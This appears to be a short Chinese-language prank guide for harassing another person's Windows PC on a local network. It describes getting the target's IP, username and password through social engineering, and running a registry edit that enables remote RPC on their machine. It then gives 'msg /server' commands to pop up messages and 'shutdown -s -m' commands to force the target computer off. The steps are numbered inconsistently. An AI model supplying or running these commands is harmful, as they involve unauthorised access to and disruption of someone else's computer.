step1:
获取对方ip与电脑用户名与密码 在 “控制面板\所有控制面板项\凭据管理器” 内添加对方凭据
将下列代码放入*.txt中,后缀改为bat批处理文件在目标电脑内运行(目的:开启类似message信使服务)
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowRemoteRPC /t REG_DWORD /d 1 /f
(备选:若step2后并未生效,则需要在“控制面板\程序\开启window功能”中开启 Microsoft Message Queue)
或者手动去修改对方注册表
!**此步骤需要社会工程学level2
step3:
win+r cmd 执行 msg /server:192.168.18.251(目标ip) * "I'm so sorry"
step4:
应对冥顽不灵的少年
shutdown -s -m //192.168.18.251(目标ip)
i'm so sorry